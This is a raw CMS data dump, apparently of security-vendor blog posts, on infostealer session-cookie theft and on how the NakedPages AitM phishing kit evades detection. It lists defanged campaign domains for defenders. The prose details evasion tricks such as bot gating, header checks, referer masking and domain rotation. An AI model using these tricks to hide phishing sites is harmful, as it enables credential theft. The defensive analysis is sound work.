(",{"data":39202,"content":39204,"nodeType":940},{"uri":39203},"https:\u002F\u002Fsecuritysenses.com\u002Fposts\u002Fmalware-targeting-password-managers",[39205],{"data":39206,"marks":39207,"value":39209,"nodeType":883},{},[39208],{"type":948},"with some exceptions",{"data":39211,"marks":39212,"value":39213,"nodeType":883},{},[],"). And when they do, ",{"data":39215,"content":39216,"nodeType":940},{"uri":39203},[39217],{"data":39218,"marks":39219,"value":39221,"nodeType":883},{},[39220],{"type":948},"they work by eavesdropping on the password manager’s browser extension in action",{"data":39223,"marks":39224,"value":39225,"nodeType":883},{},[]," – meaning they are intercepted one-at-a-time as the user uses them, rather than targeting the password manager directly and exporting the saved passwords all at once. It will be interesting to see whether these capabilities are added in the future. ",{"data":39227,"content":39228,"nodeType":879},{},[39229,39233,39242,39245,39254,39258,39267],{"data":39230,"marks":39231,"value":39232,"nodeType":883},{},[],"On the other hand, there are defensive security developments that could reduce the ability of attackers to leverage things like stolen session tokens, such as ",{"data":39234,"content":39236,"nodeType":940},{"uri":39235},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fentra\u002Fidentity\u002Fconditional-access\u002Fconcept-token-protection",[39237],{"data":39238,"marks":39239,"value":39241,"nodeType":883},{},[39240],{"type":948},"Microsoft’s token binding feature in Entra",{"data":39243,"marks":39244,"value":10244,"nodeType":883},{},[],{"data":39246,"content":39248,"nodeType":940},{"uri":39247},"https:\u002F\u002Fblog.chromium.org\u002F2024\u002F04\u002Ffighting-cookie-theft-using-device.html",[39249],{"data":39250,"marks":39251,"value":39253,"nodeType":883},{},[39252],{"type":948},"Google’s device bound session cookies",{"data":39255,"marks":39256,"value":39257,"nodeType":883},{},[],". Google also released an ",{"data":39259,"content":39261,"nodeType":940},{"uri":39260},"https:\u002F\u002Fsecurity.googleblog.com\u002F2024\u002F07\u002Fimproving-security-of-chrome-cookies-on.html?m=1",[39262],{"data":39263,"marks":39264,"value":39266,"nodeType":883},{},[39265],{"type":948},"app-bound encryption feature",{"data":39268,"marks":39269,"value":39270,"nodeType":883},{},[],", which adds additional protection against infostealers attempting to steal browser data in Chrome if the underlying Windows device is compromised. ",{"data":39272,"content":39273,"nodeType":879},{},[39274],{"data":39275,"marks":39276,"value":39277,"nodeType":883},{},[],"That said, mature versions of these controls are still years away, and while session cookie theft is a key risk of infostealers, it’s not the only risk – so alternative controls and mitigations remain valuable to security teams in the present. ",{"data":39279,"content":39283,"nodeType":971},{"target":39280},{"sys":39281},{"id":39282,"type":976,"linkType":977},"5loTnpvwGD3kaKMXBp23hZ",[],{"data":39285,"content":39286,"nodeType":879},{},[39287],{"data":39288,"marks":39289,"value":21,"nodeType":883},{},[],{"entries":39291},{"hyperlink":39292,"inline":39293,"block":39294},[],[],[39295,39299,39307,39310],{"sys":39296,"__typename":13297,"type":13298,"ctaText":39297,"buttonLabel":39298,"buttonColour":34619,"buttonUrl":38998},{"id":39012},"Learn more about modern AitM and BitM phishing toolkits","Read the Blog",{"sys":39300,"__typename":39301,"title":39302,"youTubeUrl":39303,"imagePlaceholder":39304},{"id":39035},"ExternalVideo","Session hijacking using stolen session cookies","https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=RlSweA5UfYw",{"url":39305,"width":8929,"height":39306},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F4ONwBrDgXX7NdfkMoIVu8v\u002F775f0c1646e90220b2df9fe17ec30690\u002FSlide_16_9_-_44__2_.png",1080,{"sys":39308,"__typename":13297,"type":13298,"ctaText":39309,"buttonLabel":39298,"buttonColour":13301,"buttonUrl":39156},{"id":39171},"Learn more about how we use browser telemetry to detect and stop session token theft",{"sys":39311,"__typename":13297,"type":13298,"ctaText":39312,"buttonLabel":39313,"buttonColour":13301,"buttonUrl":39314},{"id":39282},"Check out our on-demand webinar for everything you need to know about infostealers and session hijacking","Watch on-demand","https:\u002F\u002Fpushsecurity.com\u002Fresources\u002Fvideo\u002Finfostealers-webinar-ondemand\u002F",{"items":39316},[],{},"How infostealers fuel breaches with stolen creds and cookies","2024-07-31T00:00:00.000Z",{"items":39321},[39322,39904,40410],{"__typename":1967,"sys":39323,"content":39325,"title":39890,"synopsis":39891,"hashTags":59,"publishedDate":39892,"slug":39893,"tagsCollection":39894,"authorsCollection":39900},{"id":39324},"11C3shj5SlkS8sAd3AlYDp",{"json":39326},{"data":39327,"content":39328,"nodeType":875},{},[39329,39349,39368,39375,39381,39388,39395,39402,39409,39417,39436,39443,39450,39457,39463,39470,39502,39509,39516,39523,39530,39536,39543,39550,39557,39589,39595,39602,39609,39640,39646,39653,39660,39667,39674,39680,39686,39693,39700,39707,39713,39720,39727,39734,39741,39760,39776,39782,39789,39796,39802,39809,39828,39834,39841,39868,39875,39882],{"data":39330,"content":39331,"nodeType":879},{},[39332,39336,39345],{"data":39333,"marks":39334,"value":39335,"nodeType":883},{},[],"It’s been well reported that ",{"data":39337,"content":39339,"nodeType":940},{"uri":39338},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fidentity-attacks-in-the-wild\u002F",[39340],{"data":39341,"marks":39342,"value":39344,"nodeType":883},{},[39343],{"type":948},"identity attacks are on the rise",{"data":39346,"marks":39347,"value":39348,"nodeType":883},{},[],", and constantly evolving phishing tools and techniques are a big part of this. In particular, the increasing prevalence of MFA has led to AitM phishing attacks becoming much more common. The threat intelligence industry naturally wants to locate and shutdown all the phishing servers – but the phishers are fighting back.",{"data":39350,"content":39351,"nodeType":879},{},[39352,39356,39364],{"data":39353,"marks":39354,"value":39355,"nodeType":883},{},[],"Before we dive into how AitM phishing kits evade detection, you should check out our earlier blog post on ‘",{"data":39357,"content":39358,"nodeType":940},{"uri":38998},[39359],{"data":39360,"marks":39361,"value":39363,"nodeType":883},{},[39362],{"type":948},"Phishing 2.0 – how phishing toolkits are evolving with AitM",{"data":39365,"marks":39366,"value":39367,"nodeType":883},{},[],"’ if you want to get up to speed with what these toolkits are, and why attackers are using them more regularly. ",{"data":39369,"content":39370,"nodeType":879},{},[39371],{"data":39372,"marks":39373,"value":39374,"nodeType":883},{},[],"In this blog post, we’re going to look at a recent instance of the NakedPages AitM phishing toolkit and some of the steps it takes to frustrate detection and analysis. In particular, we’ll look at how malicious activity is obfuscated through the use of legitimate SaaS services. NakedPages uses a range of different techniques and so serves as a good case study as to how AitM toolkits are being designed to evade detection.",{"data":39376,"content":39380,"nodeType":971},{"target":39377},{"sys":39378},{"id":39379,"type":976,"linkType":977},"2Qcn2nNRXVkdqqxGO8lDZf",[],{"data":39382,"content":39383,"nodeType":879},{},[39384],{"data":39385,"marks":39386,"value":39387,"nodeType":883},{},[],"Before we dive in, it’s useful to keep in mind that while there is a lot of complication here, most of this happens in seconds and is transparent to the intended victim accessing from a real browser.",{"data":39389,"content":39390,"nodeType":909},{},[39391],{"data":39392,"marks":39393,"value":39394,"nodeType":883},{},[],"Step 1: Cloudflare Workers for the initial gateway",{"data":39396,"content":39397,"nodeType":879},{},[39398],{"data":39399,"marks":39400,"value":39401,"nodeType":883},{},[],"A key feature of the NakedPages kit is that it has several stages and redirections and, in order for it to operate as intended, the target has to arrive at the beginning. The first step involves visiting a URL that is simply a Cloudflare Worker. Cloudflare Workers are a serverless execution environment, a bit like AWS lambdas.",{"data":39403,"content":39404,"nodeType":879},{},[39405],{"data":39406,"marks":39407,"value":39408,"nodeType":883},{},[],"The benefit to the attacker is that this gives them a highly reputable primary domain as it is one owned and operated by Cloudflare. Flagging recently registered or uncategorized\u002Frare domains for further analysis won’t work for this. For example, the URL used in this instance was the following:",{"data":39410,"content":39411,"nodeType":879},{},[39412],{"data":39413,"marks":39414,"value":39416,"nodeType":883},{},[39415],{"type":10563},"hxxps:\u002F\u002F226028cc.502f135e3e036e726fba22d4.workers.dev",{"data":39418,"content":39419,"nodeType":879},{},[39420,39424,39433],{"data":39421,"marks":39422,"value":39423,"nodeType":883},{},[],"For other examples of Cloudflare Workers being abused for phishing, ",{"data":39425,"content":39427,"nodeType":940},{"uri":39426},"https:\u002F\u002Fwww.trustwave.com\u002Fen-us\u002Fresources\u002Fblogs\u002Fspiderlabs-blog\u002Fits-raining-phish-and-scams-how-cloudflare-pages-dev-and-workers-dev-domains-get-abused\u002F",[39428],{"data":39429,"marks":39430,"value":39432,"nodeType":883},{},[39431],{"type":948},"check out this blog post from Trustwave",{"data":39434,"marks":39435,"value":1350,"nodeType":883},{},[],{"data":39437,"content":39438,"nodeType":909},{},[39439],{"data":39440,"marks":39441,"value":39442,"nodeType":883},{},[],"Step 2: Cloudflare Turnstile for bot detection",{"data":39444,"content":39445,"nodeType":879},{},[39446],{"data":39447,"marks":39448,"value":39449,"nodeType":883},{},[],"The only purpose of the Cloudflare Worker is to act as a bot gateway to prevent automated analysis getting further than this point. For this it uses Cloudflare Turnstile. Turnstile is a highly effective tool for detecting the difference between bots and human users as a replacement for CAPTCHAs used by websites across the world. ",{"data":39451,"content":39452,"nodeType":879},{},[39453],{"data":39454,"marks":39455,"value":39456,"nodeType":883},{},[],"If it doesn’t work transparently then you’ll probably see something like this:",{"data":39458,"content":39462,"nodeType":971},{"target":39459},{"sys":39460},{"id":39461,"type":976,"linkType":977},"4XNxLbiZf3xUK1WeFDjjxl",[],{"data":39464,"content":39465,"nodeType":879},{},[39466],{"data":39467,"marks":39468,"value":39469,"nodeType":883},{},[],"However, who else wants to keep out the bots? Well, phishers of course! There are many sandbox environments and other automated platforms out there, visiting every URL they come across in the search for malicious behavior. This stops many of them in their tracks as they never get past the Turnstile check. ",{"data":39471,"content":39472,"nodeType":879},{},[39473,39477,39486,39490,39499],{"data":39474,"marks":39475,"value":39476,"nodeType":883},{},[],"Malicious use of Turnstile use has become much more common now. Examples include other criminal kits ",{"data":39478,"content":39480,"nodeType":940},{"uri":39479},"https:\u002F\u002Fblog.sekoia.io\u002Ftycoon-2fa-an-in-depth-analysis-of-the-latest-version-of-the-aitm-phishing-kit\u002F",[39481],{"data":39482,"marks":39483,"value":39485,"nodeType":883},{},[39484],{"type":948},"such as Tycoon",{"data":39487,"marks":39488,"value":39489,"nodeType":883},{},[],", as well as ",{"data":39491,"content":39493,"nodeType":940},{"uri":39492},"https:\u002F\u002Ffin3ss3g0d.net\u002Findex.php\u002F2024\u002F04\u002F08\u002Fevilgophishs-approach-to-advanced-bot-detection-with-cloudflare-turnstile\u002F",[39494],{"data":39495,"marks":39496,"value":39498,"nodeType":883},{},[39497],{"type":948},"open-source phishing tools focused on red teaming",{"data":39500,"marks":39501,"value":6141,"nodeType":883},{},[],{"data":39503,"content":39504,"nodeType":909},{},[39505],{"data":39506,"marks":39507,"value":39508,"nodeType":883},{},[],"Step 3: Required URL parameters and custom auth headers",{"data":39510,"content":39511,"nodeType":879},{},[39512],{"data":39513,"marks":39514,"value":39515,"nodeType":883},{},[],"If you get past Turnstile, then you’ll finally be redirected to a more conventionally suspicious domain. However, you’ll need to supply the correct URL parameters and headers, or that request might behave differently. ",{"data":39517,"content":39518,"nodeType":879},{},[39519],{"data":39520,"marks":39521,"value":39522,"nodeType":883},{},[],"Suspicious domains can be found and interrogated through other means, such as observing new domain registrations or certificate transparency logs. In this case, the phishers add other steps involving required URL parameters and custom headers. This means that a defender who knows the domain name can’t discover the malicious behavior just by making a simple HTTP(S) request to the domain.",{"data":39524,"content":39525,"nodeType":879},{},[39526],{"data":39527,"marks":39528,"value":39529,"nodeType":883},{},[],"The following code snippet shows how this operates. Bonus points for spotting how they actually forgot to implement their own RSA encryption function and instead send their “encrypted” user agents in clear text:",{"data":39531,"content":39535,"nodeType":971},{"target":39532},{"sys":39533},{"id":39534,"type":976,"linkType":977},"45aif31bot9phquQPkz20p",[],{"data":39537,"content":39538,"nodeType":909},{},[39539],{"data":39540,"marks":39541,"value":39542,"nodeType":883},{},[],"Step 4: Requiring JavaScript execution",{"data":39544,"content":39545,"nodeType":879},{},[39546],{"data":39547,"marks":39548,"value":39549,"nodeType":883},{},[],"Another aspect of the previous step is that it requires JavaScript to execute. That means defensive techniques that simply make HTTP(S) requests and scrape content will not automatically be able to follow the link without allowing JavaScript execution. This forces the use of dynamic sandbox techniques that actually load a DOM, as it’s almost impossible for static analysis to generically solve this problem.",{"data":39551,"content":39552,"nodeType":909},{},[39553],{"data":39554,"marks":39555,"value":39556,"nodeType":883},{},[],"Step 5: Redirecting to legitimate domains",{"data":39558,"content":39559,"nodeType":879},{},[39560,39564,39572,39576,39585],{"data":39561,"marks":39562,"value":39563,"nodeType":883},{},[],"Attackers will also redirect to legitimate domains to mask their activity. Let’s say a defender has visited the attacker’s malicious domain without executing JavaScript or supplying the correct URL parameters. The attacker doesn’t want to activate their malicious phishing behavior at this point, so they need to do something benign instead. In this case, they simply redirect to ",{"data":39565,"content":39567,"nodeType":940},{"uri":39566},"https:\u002F\u002Fexample.com",[39568],{"data":39569,"marks":39570,"value":39566,"nodeType":883},{},[39571],{"type":948},{"data":39573,"marks":39574,"value":39575,"nodeType":883},{},[],". Interestingly, ",{"data":39577,"content":39579,"nodeType":940},{"uri":39578},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=-W-LxcbUxI4&t=643s",[39580],{"data":39581,"marks":39582,"value":39584,"nodeType":883},{},[39583],{"type":948},"EvilProxy has also been seen redirecting to example.com too",{"data":39586,"marks":39587,"value":39588,"nodeType":883},{},[],":",{"data":39590,"content":39594,"nodeType":971},{"target":39591},{"sys":39592},{"id":39593,"type":976,"linkType":977},"450Y7W1uXVkKSps5y0xhBe",[],{"data":39596,"content":39597,"nodeType":909},{},[39598],{"data":39599,"marks":39600,"value":39601,"nodeType":883},{},[],"Step 6: HTTP referer header masking",{"data":39603,"content":39604,"nodeType":879},{},[39605],{"data":39606,"marks":39607,"value":39608,"nodeType":883},{},[],"Maintainers of legitimate websites often look at the HTTP referer header to see where they are being linked from. This is often a critical task for businesses, particularly for things like marketing. However, what if employees spot strange redirects coming in from suspicious looking domains like the ones used by this phishing kit? Perhaps they might investigate those domains and\u002For tip off relevant security vendors and organizations. ",{"data":39610,"content":39611,"nodeType":879},{},[39612,39616,39624,39628,39636],{"data":39613,"marks":39614,"value":39615,"nodeType":883},{},[],"Unless, of course, you were to use a service to mask the HTTP referrer – which is exactly what the phishing kit does in this case. NakedPages makes use of ",{"data":39617,"content":39619,"nodeType":940},{"uri":39618},"https:\u002F\u002Fhref.li\u002F",[39620],{"data":39621,"marks":39622,"value":39618,"nodeType":883},{},[39623],{"type":948},{"data":39625,"marks":39626,"value":39627,"nodeType":883},{},[]," as a service to strip the referral to ensure the redirection is performed anonymously. Rather conveniently, it seems the default example that ",{"data":39629,"content":39631,"nodeType":940},{"uri":39630},"https:\u002F\u002Fhref.li",[39632],{"data":39633,"marks":39634,"value":39630,"nodeType":883},{},[39635],{"type":948},{"data":39637,"marks":39638,"value":39639,"nodeType":883},{},[]," uses is… example.com:",{"data":39641,"content":39645,"nodeType":971},{"target":39642},{"sys":39643},{"id":39644,"type":976,"linkType":977},"78xFQwTG1r0YWGJ24iEdYP",[],{"data":39647,"content":39648,"nodeType":909},{},[39649],{"data":39650,"marks":39651,"value":39652,"nodeType":883},{},[],"Step 7: Loading balanced domains",{"data":39654,"content":39655,"nodeType":879},{},[39656],{"data":39657,"marks":39658,"value":39659,"nodeType":883},{},[],"You’re probably thinking: Step 7? Surely, if a victim’s browser has finally made it this far then the attackers would just serve up the malicious phishing content at this point, right? Well, we aren’t quite done yet. These initial gateway servers are one of the most important components to keep undetected, as existing phishing campaigns and (as yet unread) emails will be leading to them.",{"data":39661,"content":39662,"nodeType":879},{},[39663],{"data":39664,"marks":39665,"value":39666,"nodeType":883},{},[],"Once we get to the more obviously malicious phishing activity, there is a higher chance of detection and user reports. In this case the phishing kit actually retrieves a new URL to redirect to, along with a suitable JWT authentication parameter. The benefit of this is that when URLs\u002Fhostnames get flagged as malicious, blocked or otherwise taken down, the phishing kit can just redirect to other hostnames, and the attacker’s can keep updating with new URLs over time. ",{"data":39668,"content":39669,"nodeType":879},{},[39670],{"data":39671,"marks":39672,"value":39673,"nodeType":883},{},[],"Below we can see an example of the response containing a URL, with a JWT auth parameter:",{"data":39675,"content":39679,"nodeType":971},{"target":39676},{"sys":39677},{"id":39678,"type":976,"linkType":977},"4NpH7V5oEdTASNNJsqCJ47",[],{"data":39681,"content":39685,"nodeType":971},{"target":39682},{"sys":39683},{"id":39684,"type":976,"linkType":977},"7oqkrhNXtyOlJMEz0BZyLo",[],{"data":39687,"content":39688,"nodeType":879},{},[39689],{"data":39690,"marks":39691,"value":39692,"nodeType":883},{},[],"Automating this request in this example brings back around 20 different primary domains used for the final phishing attack. These domains are rotated over time as some are blocked and new ones are created.",{"data":39694,"content":39695,"nodeType":909},{},[39696],{"data":39697,"marks":39698,"value":39699,"nodeType":883},{},[],"Step 8: Breaking login page signatures",{"data":39701,"content":39702,"nodeType":879},{},[39703],{"data":39704,"marks":39705,"value":39706,"nodeType":883},{},[],"If all the previous checks have passed then a victim user is finally presented with a phishing page. The attacker has most closely emulated the sign-on page for live.com for Outlook in this case, though it also has some aspects from a business Microsoft login too, as we can see in the examples below:",{"data":39708,"content":39712,"nodeType":971},{"target":39709},{"sys":39710},{"id":39711,"type":976,"linkType":977},"2Ez0fgAlmkrisdQGWfL6CV",[],{"data":39714,"content":39715,"nodeType":879},{},[39716],{"data":39717,"marks":39718,"value":39719,"nodeType":883},{},[],"However, one obvious change can be seen in the HTML title in the tab header. This normally says something like “Sign in to Outlook” or “Sign in to your account”. In this case, the phishing kit has randomized the HTML title. \n\nOne super easy way to detect websites pretending to be common login pages that have 1:1 cloned the website or are performing full reverse proxy AiTM techniques would be to search for obvious HTML content like this. Not many legitimate websites should have an HTML title of “Sign in to Outlook” other than Microsoft’s own legitimate domains for it, right?",{"data":39721,"content":39722,"nodeType":879},{},[39723],{"data":39724,"marks":39725,"value":39726,"nodeType":883},{},[],"Taking a closer look, we’ll see that the HTML, DOM and JavaScript etc. differ quite significantly from the true login pages, even if the visual appearance is very similar. One reason for this is to make it harder for defenders to simply signature on specific aspects of commonly spoofed login pages.",{"data":39728,"content":39729,"nodeType":909},{},[39730],{"data":39731,"marks":39732,"value":39733,"nodeType":883},{},[],"Step 9: B2B targeting",{"data":39735,"content":39736,"nodeType":879},{},[39737],{"data":39738,"marks":39739,"value":39740,"nodeType":883},{},[],"The final interesting aspect of this particular example is that it modifies its behavior during the login process depending on whether a personal Microsoft account or an organization account is used.",{"data":39742,"content":39743,"nodeType":879},{},[39744,39748,39756],{"data":39745,"marks":39746,"value":39747,"nodeType":883},{},[],"When entering an email address associated with a personal Microsoft account, or picking ‘personal account’ when prompted after entering an email address that is used for both purposes, the server will return a 302 redirect and send the user to ",{"data":39749,"content":39751,"nodeType":940},{"uri":39750},"https:\u002F\u002Flogin.live.com\u002F",[39752],{"data":39753,"marks":39754,"value":39750,"nodeType":883},{},[39755],{"type":948},{"data":39757,"marks":39758,"value":39759,"nodeType":883},{},[]," where they can then re-enter their credentials and login to Microsoft legitimately if they continue. This reduces the potential for detection further as no AitM phishing login will actually occur.",{"data":39761,"content":39762,"nodeType":879},{},[39763,39767,39772],{"data":39764,"marks":39765,"value":39766,"nodeType":883},{},[],"On the other hand, when using an organization account the phishing process continues as expected. ",{"data":39768,"marks":39769,"value":39771,"nodeType":883},{},[39770],{"type":916},"This phishing campaign is exclusively targeting corp accounts",{"data":39773,"marks":39774,"value":39775,"nodeType":883},{},[]," and you could almost say it has a B2B (or is that A2B?) rather than B2C business model.  ",{"data":39777,"content":39778,"nodeType":909},{},[39779],{"data":39780,"marks":39781,"value":1702,"nodeType":883},{},[],{"data":39783,"content":39784,"nodeType":879},{},[39785],{"data":39786,"marks":39787,"value":39788,"nodeType":883},{},[],"As you may have guessed from the extremely suspicious domains in use and examples of sloppy coding (like forgetting to implement an encryption function) the NakedPages kit is far from sophisticated. Despite this, the tricks that attackers are using to make detection and analysis more difficult seem to be quite effective when used in a layered model. ",{"data":39790,"content":39791,"nodeType":879},{},[39792],{"data":39793,"marks":39794,"value":39795,"nodeType":883},{},[],"For example, at the time of writing this particular Worker had been up for at least two days and was currently only triggering 1 detection on VirusTotal. ",{"data":39797,"content":39801,"nodeType":971},{"target":39798},{"sys":39799},{"id":39800,"type":976,"linkType":977},"1mIOpDtmgcMasK6dEhRHsm",[],{"data":39803,"content":39804,"nodeType":879},{},[39805],{"data":39806,"marks":39807,"value":39808,"nodeType":883},{},[],"One key takeaway is that it’s near impossible to stay on top of all the phishing servers on the internet. Even the untargeted mass campaigns will initially be missed by TI feeds, let alone the targeted ones. ",{"data":39810,"content":39811,"nodeType":879},{},[39812,39816,39824],{"data":39813,"marks":39814,"value":39815,"nodeType":883},{},[],"The best foot forward for resilience against these attacks is through the use of domain-bound MFA methods like WebAuthn. Common MFA methods like OTPs, SMS, push notifications etc. are routinely bypassed using ",{"data":39817,"content":39818,"nodeType":940},{"uri":38998},[39819],{"data":39820,"marks":39821,"value":39823,"nodeType":883},{},[39822],{"type":948},"AitM techniques that proxy the MFA authentication as well",{"data":39825,"marks":39826,"value":39827,"nodeType":883},{},[],". Even if you are one of the few who use phishing-resistant MFA methods like WebAuthn or other passkeys, the devil is in the detail and we’ve seen MFA downgrade attacks being used to bypass them by choosing a phishable method that’s also active.",{"data":39829,"content":39833,"nodeType":971},{"target":39830},{"sys":39831},{"id":39832,"type":976,"linkType":977},"17lSgRFD6fDzRUn9eOHJg6",[],{"data":39835,"content":39836,"nodeType":909},{},[39837],{"data":39838,"marks":39839,"value":39840,"nodeType":883},{},[],"P.S. How did we detect this?",{"data":39842,"content":39843,"nodeType":879},{},[39844,39848,39853,39857,39865],{"data":39845,"marks":39846,"value":39847,"nodeType":883},{},[],"After all that, you might be wondering how we managed to automate a process to generically pass through all these detection evasion techniques – ",{"data":39849,"marks":39850,"value":39852,"nodeType":883},{},[39851],{"type":916},"well the short answer is: We didn’t.",{"data":39854,"marks":39855,"value":39856,"nodeType":883},{},[]," Instead, we detected the act of an employee ",{"data":39858,"content":39859,"nodeType":940},{"uri":31340},[39860],{"data":39861,"marks":39862,"value":39864,"nodeType":883},{},[39863],{"type":948},"attempting to put their Microsoft password into a website that wasn’t Microsoft",{"data":39866,"marks":39867,"value":1350,"nodeType":883},{},[],{"data":39869,"content":39870,"nodeType":879},{},[39871],{"data":39872,"marks":39873,"value":39874,"nodeType":883},{},[],"The TTP for phishing is effectively “trick someone into putting their valid credentials into the wrong site” – so detecting that behavior directly (the action of entering a legit password into the wrong site) can be a lot simpler and more effective than playing the cat-and-mouse detection → detection-evasion game.",{"data":39876,"content":39877,"nodeType":879},{},[39878],{"data":39879,"marks":39880,"value":39881,"nodeType":883},{},[],"Having said that, if you’re interested, here are the domain IOCs for this campaign:",{"data":39883,"content":39884,"nodeType":879},{},[39885],{"data":39886,"marks":39887,"value":39889,"nodeType":883},{},[39888],{"type":10563},"226028cc[.]502f135e3e036e726fba22d4[.]workers[.]dev\nacevoorgukmembership[.]buzz\nalerteditorroyalsocietyorgnz[.]buzz\nandymarshallsgeniuslocidigestghostiomghostio[.]buzz\nblogresponseinsperitycom[.]buzz\ncampaigneventbritecomnoreply[.]buzz\ncharityexcellencer1technologytrustnewsorg[.]buzz\nclerkenwelldesignweekcomnoreply[.]buzz\nconfirminfothetrainlinecomauto[.]buzz\nhealthestatejournalcomnoreply[.]buzz\nmentalhealthdesignandbuildcomnoreply[.]buzz\nnoreplynotificationswhoopcom[.]buzz\nstepexhibitionscomeventsupport[.]buzz\ntheathletice1theathleticcom[.]buzz\nthekakahoonssubstackcom[.]buzz","How AitM phishing kits evade detection","Taking a closer look at the steps that AitM phishing kits take to hide from the prying eyes of security teams and threat intelligence vendors.","2024-07-23T00:00:00.000Z","how-aitm-phishing-kits-evade-detection",{"items":39895},[39896,39898],{"sys":39897,"name":343},{"id":3276},{"sys":39899,"name":3273},{"id":3272},{"items":39901},[39902],{"fullName":3930,"firstName":3931,"jobTitle":3932,"profilePicture":39903},{"url":3934},{"__typename":1967,"sys":39905,"content":39907,"title":40396,"synopsis":40397,"hashTags":59,"publishedDate":40398,"slug":40399,"tagsCollection":40400,"authorsCollection":40406},{"id":39906},"6Uvqu6LcWzOVfA9mxtu841",{"json":39908},{"data":39909,"content":39910,"nodeType":875},{},[39911,39917,39924,39957,39964,39984,39991,40037,40044,40051,40058,40064,40071,40158,40165,40172,40195,40202,40209,40216,40223,40230,40236,40286,40293,40299,40317,40323,40330,40337,40344,40351,40358,40365,40372,40378],{"data":39912,"content":39916,"nodeType":971},{"target":39913},{"sys":39914},{"id":39915,"type":976,"linkType":977},"2HffP4X7owzpfj41jnzXmV",[],{"data":39918,"content":39919,"nodeType":879},{},[39920],{"data":39921,"marks":39922,"value":39923,"nodeType":883},{},[],"To detect session token theft, you need three things:",{"data":39925,"content":39926,"nodeType":1531},{},[39927,39937,39947],{"data":39928,"content":39929,"nodeType":1535},{},[39930],{"data":39931,"content":39932,"nodeType":879},{},[39933],{"data":39934,"marks":39935,"value":39936,"nodeType":883},{},[],"Robust logs that provide an identifier to help tie activity to a specific session",{"data":39938,"content":39939,"nodeType":1535},{},[39940],{"data":39941,"content":39942,"nodeType":879},{},[39943],{"data":39944,"marks":39945,"value":39946,"nodeType":883},{},[],"A well-oiled SOC to correlate observed activity in those logs",{"data":39948,"content":39949,"nodeType":1535},{},[39950],{"data":39951,"content":39952,"nodeType":879},{},[39953],{"data":39954,"marks":39955,"value":39956,"nodeType":883},{},[],"And telemetry to tie those logs to a trusted endpoint",{"data":39958,"content":39959,"nodeType":879},{},[39960],{"data":39961,"marks":39962,"value":39963,"nodeType":883},{},[],"The only problem? That third thing didn’t really exist. So we created it.",{"data":39965,"content":39966,"nodeType":879},{},[39967,39971,39980],{"data":39968,"marks":39969,"value":39970,"nodeType":883},{},[],"In this article, we’ll cover how Push’s recently released ",{"data":39972,"content":39974,"nodeType":940},{"uri":39973},"https:\u002F\u002Fpushsecurity.com\u002Fhelp\u002F10114#start",[39975],{"data":39976,"marks":39977,"value":39979,"nodeType":883},{},[39978],{"type":948},"session theft detection",{"data":39981,"marks":39982,"value":39983,"nodeType":883},{},[]," feature works, why we built it, and why the unique control point provided by a browser agent unlocks new capabilities for blue teams fighting the effects of infostealer malware and other stolen credential-based attacks.",{"data":39985,"content":39986,"nodeType":909},{},[39987],{"data":39988,"marks":39989,"value":39990,"nodeType":883},{},[],"(You probably already know) Why this matters",{"data":39992,"content":39993,"nodeType":879},{},[39994,39998,40007,40011,40020,40024,40033],{"data":39995,"marks":39996,"value":39997,"nodeType":883},{},[],"Session token theft is a ",{"data":39999,"content":40001,"nodeType":940},{"uri":40000},"https:\u002F\u002Fowasp.org\u002Fwww-community\u002Fattacks\u002FSession_hijacking_attack",[40002],{"data":40003,"marks":40004,"value":40006,"nodeType":883},{},[40005],{"type":948},"session hijacking",{"data":40008,"marks":40009,"value":40010,"nodeType":883},{},[]," technique where endpoint malware is used to extract sessions from an endpoint, and until recently it was ",{"data":40012,"content":40014,"nodeType":940},{"uri":40013},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2022\u002F11\u002F16\u002Ftoken-tactics-how-to-prevent-detect-and-respond-to-cloud-token-theft\u002F",[40015],{"data":40016,"marks":40017,"value":40019,"nodeType":883},{},[40018],{"type":948},"relatively rare",{"data":40021,"marks":40022,"value":40023,"nodeType":883},{},[],". It’s easier to ",{"data":40025,"content":40027,"nodeType":940},{"uri":40026},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhat-is-credential-stuffing\u002F",[40028],{"data":40029,"marks":40030,"value":40032,"nodeType":883},{},[40031],{"type":948},"gain access via a password",{"data":40034,"marks":40035,"value":40036,"nodeType":883},{},[]," than it is to steal a session cookie. ",{"data":40038,"content":40039,"nodeType":879},{},[40040],{"data":40041,"marks":40042,"value":40043,"nodeType":883},{},[],"But there’s an inverse relationship between session-based attacks and MFA adoption. As MFA becomes widespread, adversaries turn to new effective methods of initial entry.",{"data":40045,"content":40046,"nodeType":879},{},[40047],{"data":40048,"marks":40049,"value":40050,"nodeType":883},{},[],"An increasingly common approach involves the use of infostealer malware, which can extract saved credentials, browser cookies, cryptowallets, and other valuable data from the infected endpoint.",{"data":40052,"content":40053,"nodeType":879},{},[40054],{"data":40055,"marks":40056,"value":40057,"nodeType":883},{},[],"Using stolen tokens, adversaries don’t need to bypass MFA directly. They can simply import the tokens into their browser and assume an already authorized session.",{"data":40059,"content":40063,"nodeType":971},{"target":40060},{"sys":40061},{"id":40062,"type":976,"linkType":977},"66B5MBFIhbmky7VuLGbuM3",[],{"data":40065,"content":40066,"nodeType":879},{},[40067],{"data":40068,"marks":40069,"value":40070,"nodeType":883},{},[],"A few recent stats show the scope of the problem:",{"data":40072,"content":40073,"nodeType":1531},{},[40074,40095,40117,40138],{"data":40075,"content":40076,"nodeType":1535},{},[40077],{"data":40078,"content":40079,"nodeType":879},{},[40080,40084,40092],{"data":40081,"marks":40082,"value":40083,"nodeType":883},{},[],"Nearly half of the malware detected last year by Sophos targeted victims’ data specifically, and the majority of that malware was classified as infostealers. Source: ",{"data":40085,"content":40086,"nodeType":940},{"uri":38333},[40087],{"data":40088,"marks":40089,"value":40091,"nodeType":883},{},[40090],{"type":948},"2024 Sophos Threat Report",{"data":40093,"marks":40094,"value":21,"nodeType":883},{},[],{"data":40096,"content":40097,"nodeType":1535},{},[40098],{"data":40099,"content":40100,"nodeType":879},{},[40101,40105,40114],{"data":40102,"marks":40103,"value":40104,"nodeType":883},{},[],"Information-stealing malware accounted for nearly 10 percent of activity that Red Canary was able to associate with named threats last year. They also found a rise in stealer malware targeting macOS compared to previous years. Source: 